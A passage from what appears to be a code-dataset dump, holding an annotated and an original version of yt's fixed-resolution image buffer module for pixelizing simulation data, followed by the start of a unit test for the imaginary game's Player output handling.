"10":"XI", "11":"XII", "12":"XIII", "13":"XIV", "14":"XV",
"15":"XVI", "16":"XVII", "17":"XVIII", "18":"XIX", "19":"XX"}
p = re.compile("_p[0-9]+_")
m = p.search( fname )
if m is not None:
pstr = m.string[m.start()+1:m.end()-1]
segments = fname.split("_")
for i,s in enumerate(segments):
segments[i] = s.capitalize()
if s == pstr:
ipstr = i
element = segments[ipstr-1]
roman = pnum2rom[pstr[1:]]
label = element + '\ ' + roman + '\ ' + \
'\ '.join(segments[ipstr+1:])
else:
label = fname
return label
def _get_info(self, item):
    """Assemble the metadata dict attached to each pixelized image.

    Records the data source, axis, field name, image-plane limits, unit
    information, center, and a LaTeX display label for *item*.
    """
    info = {}
    ftype, fname = field = self.data_source._determine_fields(item)[0]
    finfo = self.data_source.ds._get_field_info(*field)
    info['data_source'] = self.data_source.__str__()
    info['axis'] = self.data_source.axis
    info['field'] = str(item)
    info['xlim'] = self.bounds[:2]
    info['ylim'] = self.bounds[2:]
    info['length_unit'] = self.data_source.ds.length_unit
    info['length_to_cm'] = info['length_unit'].in_cgs().to_ndarray()
    info['center'] = self.data_source.center

    # Not every data source carries these attributes (e.g. slices have
    # no weight_field; projections have no coord), so probe tolerantly.
    try:
        info['coord'] = self.data_source.coord
    except AttributeError:
        pass

    try:
        info['weight_field'] = self.data_source.weight_field
    except AttributeError:
        pass

    info['label'] = finfo.display_name
    if info['label'] is None:
        # Build a LaTeX label from the field name.  The original code
        # assigned each branch's label twice, with the first store dead;
        # only the effective assignment is kept.  Raw strings avoid the
        # invalid '\ ' escape sequence.
        if self._is_ion(fname):
            fname = self._ion_to_label(fname)
            info['label'] = r'$\rm{' + fname.replace('_', r'\ ') + r'}$'
        else:
            info['label'] = r'$\rm{' + fname.replace('_', r'\ ').title() + r'}$'
    elif info['label'].find('$') == -1:
        info['label'] = info['label'].replace(' ', r'\ ')
        info['label'] = r'$\rm{' + info['label'] + r'}$'
    return info
def convert_to_pixel(self, coords):
r"""This function converts coordinates in code-space to pixel-space.
Parameters
----------
coords : sequence of array_like
This is (x_coord, y_coord). Because of the way the math is done,
these can both be arrays.
Returns
-------
output : sequence of array_like
This returns px_coord, py_coord
"""
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
px = (coords[0] - self.bounds[0])/dpx
py = (coords[1] - self.bounds[2])/dpy
return (px, py)
def convert_distance_x(self, distance):
r"""This function converts code-space distance into pixel-space
distance in the x-coordiante.
Parameters
----------
distance : array_like
This is x-distance in code-space you would like to convert.
Returns
-------
output : array_like
The return value is the distance in the y-pixel coordinates.
"""
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
return distance/dpx
def convert_distance_y(self, distance):
r"""This function converts code-space distance into pixel-space
distance in the y-coordiante.
Parameters
----------
distance : array_like
This is y-distance in code-space you would like to convert.
Returns
-------
output : array_like
The return value is the distance in the x-pixel coordinates.
"""
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
return distance/dpy
def export_hdf5(self, filename, fields = None):
    r"""Export a set of fields to datasets in an HDF5 file.

    Parameters
    ----------
    filename : string
        This file will be opened in "append" mode.
    fields : list of strings
        These fields will be pixelized and output.  Defaults to every
        field already cached in the buffer.
    """
    import h5py
    if fields is None: fields = list(self.data.keys())
    # A context manager guarantees the file is closed even if pixelizing
    # a field raises; the original left the handle open on error.
    with h5py.File(filename, "a") as output:
        for field in fields:
            output.create_dataset(field, data=self[field])
def export_fits(self, filename, fields=None, clobber=False,
                other_keys=None, units="cm"):
    r"""Write pixelized fields to a FITS file.

    Parameters
    ----------
    filename : string
        The name of the FITS file to be written.
    fields : list of strings, optional
        Fields to pixelize and write; defaults to every field already
        cached in the buffer.
    clobber : boolean
        If the file exists, this governs whether it is overwritten.
    other_keys : dictionary, optional
        Extra header keyword/value pairs to record in the FITS header.
    units : string, optional
        Length units for the coordinates, default 'cm'.
    """
    from yt.utilities.fits_image import FITSImageData

    if fields is None:
        export_fields = list(self.data.keys())
    else:
        export_fields = ensure_list(fields)

    if not export_fields:
        raise RuntimeError(
            "No fields to export. Either pass a field or list of fields to "
            "export_fits or access a field from the fixed resolution buffer "
            "object."
        )

    fits_img = FITSImageData(self, fields=export_fields, units=units)
    if other_keys is not None:
        for key, value in other_keys.items():
            fits_img.update_all_headers(key, value)
    fits_img.writeto(filename, clobber=clobber)
def export_dataset(self, fields=None, nprocs=1):
    r"""Turn the pixelized buffer into an in-memory yt dataset.

    Unit information and other parameters (e.g. geometry, current_time)
    are copied from the parent dataset, so the result can be analyzed
    like any other dataset.

    Parameters
    ----------
    fields : list of strings, optional
        Fields to include; defaults to every field already cached.
    nprocs : integer, optional
        If greater than 1, decompose the data into this many subarrays.

    Examples
    --------
    >>> import yt
    >>> ds = yt.load("GasSloshing/sloshing_nomag2_hdf5_plt_cnt_0150")
    >>> slc = ds.slice(2, 0.0)
    >>> frb = slc.to_frb((500., "kpc"), 500)
    >>> ds2 = frb.export_dataset(fields=["density", "temperature"], nprocs=32)
    """
    nx, ny = self.buff_size
    if fields is None:
        fields = list(self.keys())

    # Each field becomes an (nx, ny, 1) array tagged with its unit string.
    grid_data = {}
    for field in fields:
        image = self[field]
        grid_data[field] = (image.d.T.reshape(nx, ny, 1), str(image.units))

    code_bounds = [b.in_units("code_length").v for b in self.bounds]
    bbox = np.array([[code_bounds[0], code_bounds[1]],
                     [code_bounds[2], code_bounds[3]],
                     [0., 1.]])
    return load_uniform_grid(grid_data, [nx, ny, 1],
                             length_unit=self.ds.length_unit,
                             bbox=bbox,
                             sim_time=self.ds.current_time.in_units("s").v,
                             mass_unit=self.ds.mass_unit,
                             time_unit=self.ds.time_unit,
                             velocity_unit=self.ds.velocity_unit,
                             magnetic_unit=self.ds.magnetic_unit,
                             periodicity=(False, False, False),
                             geometry=self.ds.geometry,
                             nprocs=nprocs)
def save_as_dataset(self, filename=None, fields=None):
    r"""Write the buffer out as a reloadable yt dataset.

    Saves either the currently cached fields, or those named in
    *fields*, to an HDF5 file that can be re-loaded with ``yt.load``.

    Parameters
    ----------
    filename : str, optional
        The name of the file to be written.  If None, the name is a
        combination of the original dataset and the container type.
    fields : list of strings or tuples, optional
        Fields to save to disk; defaults to every field that has been
        queried so far.

    Returns
    -------
    filename : str
        The name of the file that has been created.
    """
    keyword = "%s_%s_frb" % (str(self.ds), self.data_source._type_name)
    filename = get_output_filename(filename, keyword, ".h5")

    out_data = {}
    if fields is None:
        out_data.update(self.data)
    else:
        for f in self.data_source._determine_fields(fields):
            out_data[f] = self[f]

    ftypes = {field: "grid" for field in out_data}

    # Record the container's defining attributes so the data object can
    # be reconstructed on reload.
    extra_attrs = {arg: getattr(self.data_source, arg, None)
                   for arg in self.data_source._con_args +
                   self.data_source._tds_attrs}
    extra_attrs["con_args"] = self.data_source._con_args
    extra_attrs["left_edge"] = self.ds.arr([self.bounds[0],
                                            self.bounds[2]])
    extra_attrs["right_edge"] = self.ds.arr([self.bounds[1],
                                             self.bounds[3]])
    extra_attrs["ActiveDimensions"] = self.buff_size
    extra_attrs["level"] = 0
    extra_attrs["data_type"] = "yt_frb"
    extra_attrs["container_type"] = self.data_source._type_name
    extra_attrs["dimensionality"] = self.data_source._dimensionality
    # Bare name resolves to the module-level helper imported from
    # yt.frontends.ytdata.utilities, not this method.
    save_as_dataset(self.ds, filename, out_data, field_types=ftypes,
                    extra_attrs=extra_attrs)
    return filename
@property
def limits(self):
rv = dict(x = None, y = None, z = None)
xax = self.ds.coordinates.x_axis[self.axis]
yax = self.ds.coordinates.y_axis[self.axis]
xn = self.ds.coordinates.axis_name[xax]
yn = self.ds.coordinates.axis_name[yax]
rv[xn] = (self.bounds[0], self.bounds[1])
rv[yn] = (self.bounds[2], self.bounds[3])
return rv
def setup_filters(self):
    """Attach an ``apply_<filtername>`` convenience method to this
    instance for every image filter in the registry."""
    # Skip the generic base entry in the registry.
    ignored = ['FixedResolutionBufferFilter']
    for key in filter_registry:
        if key in ignored:
            continue
        filtername = filter_registry[key]._filter_name
        FilterMaker = filter_registry[key]
        filt = apply_filter(FilterMaker)
        filt.__doc__ = FilterMaker.__doc__
        # Bind on the instance __dict__ so each buffer carries its own
        # bound filter entry points.
        self.__dict__['apply_' + filtername] = \
            types.MethodType(filt, self)
class CylindricalFixedResolutionBuffer(FixedResolutionBuffer):
    """A fixed-resolution buffer for cylindrical (r, theta) data:
    pixelization covers a disk of the given radius instead of a
    rectangular window."""

    def __init__(self, data_source, radius, buff_size, antialias=True):
        self.data_source = data_source
        self.ds = data_source.ds
        self.radius = radius
        self.buff_size = buff_size
        self.antialias = antialias
        self.data = {}

        parent_ds = getattr(data_source, "ds", None)
        if parent_ds is not None:
            # Weak proxy: the dataset's plot list must not keep this
            # buffer alive.
            parent_ds.plots.append(weakref.proxy(self))

    def __getitem__(self, item):
        if item in self.data:
            return self.data[item]
        source = self.data_source
        image = pixelize_cylinder(source["r"], source["dr"],
                                  source["theta"], source["dtheta"],
                                  self.buff_size,
                                  source[item].astype("float64"),
                                  self.radius)
        self[item] = image
        return image
class ObliqueFixedResolutionBuffer(FixedResolutionBuffer):
    """A fixed-resolution buffer for non-axis-aligned 2D data objects,
    primarily cutting planes, pixelized with the off-axis cartesian
    pixelizer."""

    def __getitem__(self, item):
        if item in self.data:
            return self.data[item]
        source = self.data_source
        # Order cells by descending dx before deposition.
        order = np.argsort(source['dx'])[::-1]
        window_bounds = []
        for edge in self.bounds:
            # Strip units down to floats in code_length if present.
            if hasattr(edge, "in_units"):
                edge = float(edge.in_units("code_length"))
            window_bounds.append(edge)
        raw = pixelize_off_axis_cartesian(
            source['x'], source['y'], source['z'],
            source['px'], source['py'],
            source['pdx'], source['pdy'], source['pdz'],
            source.center, source._inv_mat, order,
            source[item],
            self.buff_size[0], self.buff_size[1],
            window_bounds).transpose()
        image = ImageArray(raw, input_units=source[item].units,
                           info=self._get_info(item))
        self[item] = image
        return image
class OffAxisProjectionFixedResolutionBuffer(FixedResolutionBuffer):
    """
    This object is a subclass of
    :class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
    that supports off axis projections.  This calls the volume renderer.
    """
    def __init__(self, data_source, bounds, buff_size, antialias = True,
                 periodic = False):
        self.data = {}
        FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size, antialias, periodic)

    def __getitem__(self, item):
        """Render the off-axis projection of *item* (cached after the
        first access) and return it as an ImageArray."""
        if item in self.data: return self.data[item]
        mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
            (item, self.buff_size[0], self.buff_size[1]))
        dd = self.data_source
        # Bounds are 3D here (xmin, xmax, ymin, ymax, zmin, zmax) since
        # the projection integrates through a volume.
        width = self.ds.arr((self.bounds[1] - self.bounds[0],
                             self.bounds[3] - self.bounds[2],
                             self.bounds[5] - self.bounds[4]))
        buff = off_axis_projection(dd.dd, dd.center, dd.normal_vector,
                                   width, dd.resolution, item,
                                   weight=dd.weight_field, volume=dd.volume,
                                   no_ghost=dd.no_ghost,
                                   interpolated=dd.interpolated,
                                   north_vector=dd.north_vector,
                                   method=dd.method)
        # NOTE(review): swapaxes presumably matches the orientation the
        # rest of the FRB machinery expects -- confirm against the
        # axis-aligned pixelizer output.
        ia = ImageArray(buff.swapaxes(0,1), info=self._get_info(item))
        self[item] = ia
        return ia
class ParticleImageBuffer(FixedResolutionBuffer):
    """
    This object is a subclass of
    :class:`yt.visualization.fixed_resolution.FixedResolutionBuffer`
    that supports particle plots.  It splats points onto an image
    buffer.
    """
    def __init__(self, data_source, bounds, buff_size, antialias=True,
                 periodic=False):
        self.data = {}
        FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size,
                                       antialias, periodic)

        # set up the axis field names for the two image-plane axes,
        # e.g. "particle_position_x" / "particle_position_y"
        axis = self.axis
        xax = self.ds.coordinates.x_axis[axis]
        yax = self.ds.coordinates.y_axis[axis]
        ax_field_template = 'particle_position_%s'
        self.x_field = ax_field_template % self.ds.coordinates.axis_name[xax]
        self.y_field = ax_field_template % self.ds.coordinates.axis_name[yax]

    def __getitem__(self, item):
        """Splat the particle field *item* onto the image buffer,
        normalizing by the weight field when one is set."""
        if item in self.data:
            return self.data[item]
        mylog.info("Splatting (%s) onto a %d by %d mesh" %
                   (item, self.buff_size[0], self.buff_size[1]))
        bounds = []
        for b in self.bounds:
            # Bounds may carry units; strip to floats in code_length.
            if hasattr(b, "in_units"):
                b = float(b.in_units("code_length"))
            bounds.append(b)

        ftype = item[0]
        x_data = self.data_source.dd[ftype, self.x_field]
        y_data = self.data_source.dd[ftype, self.y_field]
        data = self.data_source.dd[item]

        # convert particle positions to normalized [0, 1] image coords
        px = (x_data - self.bounds[0]) / (self.bounds[1] - self.bounds[0])
        py = (y_data - self.bounds[2]) / (self.bounds[3] - self.bounds[2])

        # select only the particles that will actually show up in the image
        mask = np.logical_and(np.logical_and(px >= 0.0, px <= 1.0),
                              np.logical_and(py >= 0.0, py <= 1.0))

        weight_field = self.data_source.weight_field
        if weight_field is None:
            weight_data = np.ones_like(data.v)
        else:
            weight_data = self.data_source.dd[weight_field]
        splat_vals = weight_data[mask]*data[mask]

        # splat (weight * value) for the selected particles
        buff = np.zeros(self.buff_size)
        add_points_to_greyscale_image(buff,
                                      px[mask],
                                      py[mask],
                                      splat_vals)
        ia = ImageArray(buff, input_units=data.units,
                        info=self._get_info(item))

        # divide by the splatted weight_field, if needed; pixels with no
        # deposited weight are left untouched to avoid division by zero
        if weight_field is not None:
            weight_buff = np.zeros(self.buff_size)
            add_points_to_greyscale_image(weight_buff,
                                          px[mask],
                                          py[mask],
                                          weight_data[mask])
            weight_array = ImageArray(weight_buff,
                                      input_units=weight_data.units,
                                      info=self._get_info(item))
            locs = np.where(weight_array > 0)
            ia[locs] /= weight_array[locs]

        self.data[item] = ia
        return self.data[item]

    # over-ride the base class version, since we don't want to exclude
    # particle fields
    def _get_data_source_fields(self):
        exclude = self.data_source._key_fields + list(self._exclude_fields)
        # NOTE(review): "+=" mutates data_source.fields in place when it
        # is a list -- confirm this side effect is intended.
        fields = getattr(self.data_source, "fields", [])
        fields += getattr(self.data_source, "field_data", {}).keys()
        for f in fields:
            if f not in exclude:
                self[f]
| 39.598519 | 148 | 0.564331 |
from yt.frontends.ytdata.utilities import \
save_as_dataset
from yt.funcs import \
get_output_filename, \
mylog, \
ensure_list
from .volume_rendering.api import off_axis_projection
from .fixed_resolution_filters import apply_filter, filter_registry
from yt.data_objects.image_array import ImageArray
from yt.utilities.lib.pixelization_routines import \
pixelize_cylinder, pixelize_off_axis_cartesian
from yt.utilities.lib.api import add_points_to_greyscale_image
from yt.frontends.stream.api import load_uniform_grid
import numpy as np
import weakref
import re
import types
class FixedResolutionBuffer(object):
_exclude_fields = ('pz','pdz','dx','x','y','z',
'r', 'dr', 'phi', 'dphi', 'theta', 'dtheta',
('index','dx'),('index','x'),('index','y'),('index','z'),
('index', 'r'), ('index', 'dr'),
('index', 'phi'), ('index', 'dphi'),
('index', 'theta'), ('index', 'dtheta'))
def __init__(self, data_source, bounds, buff_size, antialias = True,
periodic = False):
self.data_source = data_source
self.ds = data_source.ds
self.bounds = bounds
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
self._filters = []
self.axis = data_source.axis
self.periodic = periodic
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
if self.data_source.axis < 3:
DLE = self.ds.domain_left_edge
DRE = self.ds.domain_right_edge
DD = float(self.periodic)*(DRE - DLE)
axis = self.data_source.axis
xax = self.ds.coordinates.x_axis[axis]
yax = self.ds.coordinates.y_axis[axis]
self._period = (DD[xax], DD[yax])
self._edges = ( (DLE[xax], DRE[xax]), (DLE[yax], DRE[yax]) )
self.setup_filters()
def keys(self):
return self.data.keys()
def __delitem__(self, item):
del self.data[item]
def __getitem__(self, item):
if item in self.data: return self.data[item]
mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
(item, self.buff_size[0], self.buff_size[1]))
bounds = []
for b in self.bounds:
if hasattr(b, "in_units"):
b = float(b.in_units("code_length"))
bounds.append(b)
buff = self.ds.coordinates.pixelize(self.data_source.axis,
self.data_source, item, bounds, self.buff_size,
int(self.antialias))
for name, (args, kwargs) in self._filters:
buff = filter_registry[name](*args[1:], **kwargs).apply(buff)
ia = ImageArray(buff, input_units=self.data_source[item].units,
info=self._get_info(item))
self.data[item] = ia
return self.data[item]
def __setitem__(self, item, val):
self.data[item] = val
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude and f[0] not in self.data_source.ds.particle_types:
self[f]
def _is_ion( self, fname ):
p = re.compile("_p[0-9]+_")
result = False
if p.search( fname ) is not None:
result = True
return result
def _ion_to_label( self, fname ):
pnum2rom = {
"0":"I", "1":"II", "2":"III", "3":"IV", "4":"V",
"5":"VI", "6":"VII", "7":"VIII", "8":"IX", "9":"X",
"10":"XI", "11":"XII", "12":"XIII", "13":"XIV", "14":"XV",
"15":"XVI", "16":"XVII", "17":"XVIII", "18":"XIX", "19":"XX"}
p = re.compile("_p[0-9]+_")
m = p.search( fname )
if m is not None:
pstr = m.string[m.start()+1:m.end()-1]
segments = fname.split("_")
for i,s in enumerate(segments):
segments[i] = s.capitalize()
if s == pstr:
ipstr = i
element = segments[ipstr-1]
roman = pnum2rom[pstr[1:]]
label = element + '\ ' + roman + '\ ' + \
'\ '.join(segments[ipstr+1:])
else:
label = fname
return label
def _get_info(self, item):
info = {}
ftype, fname = field = self.data_source._determine_fields(item)[0]
finfo = self.data_source.ds._get_field_info(*field)
info['data_source'] = self.data_source.__str__()
info['axis'] = self.data_source.axis
info['field'] = str(item)
info['xlim'] = self.bounds[:2]
info['ylim'] = self.bounds[2:]
info['length_unit'] = self.data_source.ds.length_unit
info['length_to_cm'] = info['length_unit'].in_cgs().to_ndarray()
info['center'] = self.data_source.center
try:
info['coord'] = self.data_source.coord
except AttributeError:
pass
try:
info['weight_field'] = self.data_source.weight_field
except AttributeError:
pass
info['label'] = finfo.display_name
if info['label'] is None:
if self._is_ion( fname ):
fname = self._ion_to_label( fname )
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ')+r'}$'
else:
info['label'] = r'$\rm{'+fname+r'}$'
info['label'] = r'$\rm{'+fname.replace('_','\ ').title()+r'}$'
elif info['label'].find('$') == -1:
info['label'] = info['label'].replace(' ','\ ')
info['label'] = r'$\rm{'+info['label']+r'}$'
return info
def convert_to_pixel(self, coords):
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
px = (coords[0] - self.bounds[0])/dpx
py = (coords[1] - self.bounds[2])/dpy
return (px, py)
def convert_distance_x(self, distance):
dpx = (self.bounds[1]-self.bounds[0])/self.buff_size[0]
return distance/dpx
def convert_distance_y(self, distance):
dpy = (self.bounds[3]-self.bounds[2])/self.buff_size[1]
return distance/dpy
def export_hdf5(self, filename, fields = None):
import h5py
if fields is None: fields = list(self.data.keys())
output = h5py.File(filename, "a")
for field in fields:
output.create_dataset(field,data=self[field])
output.close()
def export_fits(self, filename, fields=None, clobber=False,
other_keys=None, units="cm"):
from yt.utilities.fits_image import FITSImageData
if fields is None:
fields = list(self.data.keys())
else:
fields = ensure_list(fields)
if len(fields) == 0:
raise RuntimeError(
"No fields to export. Either pass a field or list of fields to "
"export_fits or access a field from the fixed resolution buffer "
"object."
)
fib = FITSImageData(self, fields=fields, units=units)
if other_keys is not None:
for k,v in other_keys.items():
fib.update_all_headers(k,v)
fib.writeto(filename, clobber=clobber)
def export_dataset(self, fields=None, nprocs=1):
nx, ny = self.buff_size
data = {}
if fields is None:
fields = list(self.keys())
for field in fields:
arr = self[field]
data[field] = (arr.d.T.reshape(nx,ny,1), str(arr.units))
bounds = [b.in_units("code_length").v for b in self.bounds]
bbox = np.array([[bounds[0],bounds[1]],[bounds[2],bounds[3]],[0.,1.]])
return load_uniform_grid(data, [nx,ny,1],
length_unit=self.ds.length_unit,
bbox=bbox,
sim_time=self.ds.current_time.in_units("s").v,
mass_unit=self.ds.mass_unit,
time_unit=self.ds.time_unit,
velocity_unit=self.ds.velocity_unit,
magnetic_unit=self.ds.magnetic_unit,
periodicity=(False,False,False),
geometry=self.ds.geometry,
nprocs=nprocs)
def save_as_dataset(self, filename=None, fields=None):
keyword = "%s_%s_frb" % (str(self.ds), self.data_source._type_name)
filename = get_output_filename(filename, keyword, ".h5")
data = {}
if fields is not None:
for f in self.data_source._determine_fields(fields):
data[f] = self[f]
else:
data.update(self.data)
ftypes = dict([(field, "grid") for field in data])
extra_attrs = dict([(arg, getattr(self.data_source, arg, None))
for arg in self.data_source._con_args +
self.data_source._tds_attrs])
extra_attrs["con_args"] = self.data_source._con_args
extra_attrs["left_edge"] = self.ds.arr([self.bounds[0],
self.bounds[2]])
extra_attrs["right_edge"] = self.ds.arr([self.bounds[1],
self.bounds[3]])
extra_attrs["ActiveDimensions"] = self.buff_size
extra_attrs["level"] = 0
extra_attrs["data_type"] = "yt_frb"
extra_attrs["container_type"] = self.data_source._type_name
extra_attrs["dimensionality"] = self.data_source._dimensionality
save_as_dataset(self.ds, filename, data, field_types=ftypes,
extra_attrs=extra_attrs)
return filename
@property
def limits(self):
rv = dict(x = None, y = None, z = None)
xax = self.ds.coordinates.x_axis[self.axis]
yax = self.ds.coordinates.y_axis[self.axis]
xn = self.ds.coordinates.axis_name[xax]
yn = self.ds.coordinates.axis_name[yax]
rv[xn] = (self.bounds[0], self.bounds[1])
rv[yn] = (self.bounds[2], self.bounds[3])
return rv
def setup_filters(self):
ignored = ['FixedResolutionBufferFilter']
for key in filter_registry:
if key in ignored:
continue
filtername = filter_registry[key]._filter_name
FilterMaker = filter_registry[key]
filt = apply_filter(FilterMaker)
filt.__doc__ = FilterMaker.__doc__
self.__dict__['apply_' + filtername] = \
types.MethodType(filt, self)
class CylindricalFixedResolutionBuffer(FixedResolutionBuffer):
def __init__(self, data_source, radius, buff_size, antialias = True) :
self.data_source = data_source
self.ds = data_source.ds
self.radius = radius
self.buff_size = buff_size
self.antialias = antialias
self.data = {}
ds = getattr(data_source, "ds", None)
if ds is not None:
ds.plots.append(weakref.proxy(self))
def __getitem__(self, item) :
if item in self.data: return self.data[item]
buff = pixelize_cylinder(self.data_source["r"], self.data_source["dr"],
self.data_source["theta"], self.data_source["dtheta"],
self.buff_size, self.data_source[item].astype("float64"),
self.radius)
self[item] = buff
return buff
class ObliqueFixedResolutionBuffer(FixedResolutionBuffer):
    """Fixed resolution buffer for oblique (cutting-plane) data sources.

    Fields are deposited with ``pixelize_off_axis_cartesian`` using the
    source's in-plane ``px``/``py`` coordinates and its ``_inv_mat`` matrix.
    """

    def __getitem__(self, item):
        if item in self.data:
            return self.data[item]
        src = self.data_source
        # Cells ordered by dx, largest first -- presumably so finer cells
        # are deposited last and overwrite coarser ones.
        order = np.argsort(src['dx'])[::-1]
        # Strip units from any unyt-style bounds down to code_length floats.
        bounds = [float(b.in_units("code_length")) if hasattr(b, "in_units")
                  else b for b in self.bounds]
        buff = pixelize_off_axis_cartesian(
            src['x'], src['y'], src['z'],
            src['px'], src['py'],
            src['pdx'], src['pdy'], src['pdz'],
            src.center, src._inv_mat, order,
            src[item],
            self.buff_size[0], self.buff_size[1],
            bounds).transpose()
        ia = ImageArray(buff, input_units=src[item].units,
                        info=self._get_info(item))
        self[item] = ia
        return ia
class OffAxisProjectionFixedResolutionBuffer(FixedResolutionBuffer):
    """Fixed resolution buffer whose pixels come from an off-axis
    projection; ``__getitem__`` drives ``off_axis_projection`` with the
    parameters stored on the data source (center, normal vector, weight
    field, ...).
    """

    def __init__(self, data_source, bounds, buff_size, antialias=True,
                 periodic=False):
        # Initialize the cache before the base constructor runs.
        self.data = {}
        FixedResolutionBuffer.__init__(self, data_source, bounds,
                                       buff_size, antialias, periodic)

    def __getitem__(self, item):
        try:
            return self.data[item]
        except KeyError:
            pass
        mylog.info("Making a fixed resolution buffer of (%s) %d by %d" %
                   (item, self.buff_size[0], self.buff_size[1]))
        proj = self.data_source
        # Extent of the projection volume along each bounded axis pair.
        width = self.ds.arr((self.bounds[1] - self.bounds[0],
                             self.bounds[3] - self.bounds[2],
                             self.bounds[5] - self.bounds[4]))
        buff = off_axis_projection(proj.dd, proj.center, proj.normal_vector,
                                   width, proj.resolution, item,
                                   weight=proj.weight_field,
                                   volume=proj.volume,
                                   no_ghost=proj.no_ghost,
                                   interpolated=proj.interpolated,
                                   north_vector=proj.north_vector,
                                   method=proj.method)
        image = ImageArray(buff.swapaxes(0, 1), info=self._get_info(item))
        self[item] = image
        return image
class ParticleImageBuffer(FixedResolutionBuffer):
    """FRB that deposits ("splats") particle fields onto a regular mesh.

    Particle positions along the two image-plane axes are normalized into
    the unit square and handed to ``add_points_to_greyscale_image``; when
    the data source has a weight field, the deposited image is divided by
    a separately deposited weight buffer.
    """
    def __init__(self, data_source, bounds, buff_size, antialias=True,
                 periodic=False):
        self.data = {}
        FixedResolutionBuffer.__init__(self, data_source, bounds, buff_size,
                                       antialias, periodic)
        # Resolve the particle-position fields for the two image-plane
        # axes of self.axis via the coordinate handler.
        axis = self.axis
        xax = self.ds.coordinates.x_axis[axis]
        yax = self.ds.coordinates.y_axis[axis]
        ax_field_template = 'particle_position_%s'
        self.x_field = ax_field_template % self.ds.coordinates.axis_name[xax]
        self.y_field = ax_field_template % self.ds.coordinates.axis_name[yax]
    def __getitem__(self, item):
        """Return the splatted image for ``item``, computing and caching it."""
        if item in self.data:
            return self.data[item]
        mylog.info("Splatting (%s) onto a %d by %d mesh" %
                   (item, self.buff_size[0], self.buff_size[1]))
        # NOTE(review): this unit-stripped copy of the bounds is never used
        # below -- the normalization reads self.bounds directly. Dead code?
        bounds = []
        for b in self.bounds:
            if hasattr(b, "in_units"):
                b = float(b.in_units("code_length"))
            bounds.append(b)
        # Read positions with the same field type as the requested field.
        ftype = item[0]
        x_data = self.data_source.dd[ftype, self.x_field]
        y_data = self.data_source.dd[ftype, self.y_field]
        data = self.data_source.dd[item]
        # Normalize positions into [0, 1] inside the image bounds and mask
        # out particles that fall outside the image.
        px = (x_data - self.bounds[0]) / (self.bounds[1] - self.bounds[0])
        py = (y_data - self.bounds[2]) / (self.bounds[3] - self.bounds[2])
        mask = np.logical_and(np.logical_and(px >= 0.0, px <= 1.0),
                              np.logical_and(py >= 0.0, py <= 1.0))
        weight_field = self.data_source.weight_field
        if weight_field is None:
            # Unweighted: every particle contributes with unit weight.
            weight_data = np.ones_like(data.v)
        else:
            weight_data = self.data_source.dd[weight_field]
        splat_vals = weight_data[mask]*data[mask]
        buff = np.zeros(self.buff_size)
        add_points_to_greyscale_image(buff,
                                      px[mask],
                                      py[mask],
                                      splat_vals)
        ia = ImageArray(buff, input_units=data.units,
                        info=self._get_info(item))
        # Weighted splat: divide by the deposited weights wherever any
        # weight landed, leaving empty pixels untouched.
        if weight_field is not None:
            weight_buff = np.zeros(self.buff_size)
            add_points_to_greyscale_image(weight_buff,
                                          px[mask],
                                          py[mask],
                                          weight_data[mask])
            weight_array = ImageArray(weight_buff,
                                      input_units=weight_data.units,
                                      info=self._get_info(item))
            locs = np.where(weight_array > 0)
            ia[locs] /= weight_array[locs]
        self.data[item] = ia
        return self.data[item]
    # particle fields
    def _get_data_source_fields(self):
        """Request every non-key, non-excluded field from the data source."""
        exclude = self.data_source._key_fields + list(self._exclude_fields)
        # NOTE(review): when the data source exposes a ``fields`` list this
        # aliases it, so the += below mutates the data source's own list --
        # consider copying with list(...) first; confirm against callers.
        fields = getattr(self.data_source, "fields", [])
        fields += getattr(self.data_source, "field_data", {}).keys()
        for f in fields:
            if f not in exclude:
                self[f]
| true | true |
1c30687beb3e77c32ee8376ffc89c6780a92f2a7 | 2,205 | py | Python | imaginary/test/test_player.py | glyph/imaginary | 62299c8a0481bbee51444e688f45385a81cad328 | [
"MIT"
] | 25 | 2015-01-10T02:26:43.000Z | 2021-08-20T09:40:46.000Z | imaginary/test/test_player.py | DalavanCloud/imaginary | e84abc98d400cff5e262df2b34e725dde575af8e | [
"MIT"
] | 65 | 2015-01-07T08:02:53.000Z | 2022-02-06T02:15:09.000Z | imaginary/test/test_player.py | DalavanCloud/imaginary | e84abc98d400cff5e262df2b34e725dde575af8e | [
"MIT"
] | 7 | 2015-03-03T18:44:29.000Z | 2021-07-28T02:54:10.000Z |
"""
Tests for L{imaginary.wiring.player}.
"""
from twisted.trial import unittest
from axiom import store
from imaginary import objects
from imaginary.objects import Container
from imaginary.wiring import player
class PlayerTest(unittest.TestCase):
    """Tests for L{player.Player} wired to an in-memory store and a
    captured L{StringTransport}."""
    def setUp(self):
        # Build a minimal world: an actor "bob" inside a room, driven by a
        # Player whose output lands on a StringTransport we can inspect.
        self.store = store.Store()
        self.bob = objects.Thing(store=self.store, name=u"bob")
        self.room = objects.Thing(store=self.store, name=u"a place")
        roomContainer = Container.createFor(self.room, capacity=1000)
        self.bob.moveTo(roomContainer)
        self.actor = objects.Actor.createFor(self.bob)
        self.player = player.Player(self.bob)
        self.player.useColors = False
        from twisted.test.proto_helpers import StringTransport
        self.transport = StringTransport()
        # Stand-in protocol: only the write() used by Player is needed.
        class Protocol:
            write = self.transport.write
        self.player.setProtocol(Protocol())
    def testSend(self):
        """send() accepts a string, tuple, list, or generator of strings."""
        self.player.send("Hi\n")
        self.assertEquals(self.transport.value(), "Hi\n")
        self.player.send(("Hi", "\n"))
        self.assertEquals(self.transport.value(), "Hi\nHi\n")
        self.player.send(["Hi", "\n"])
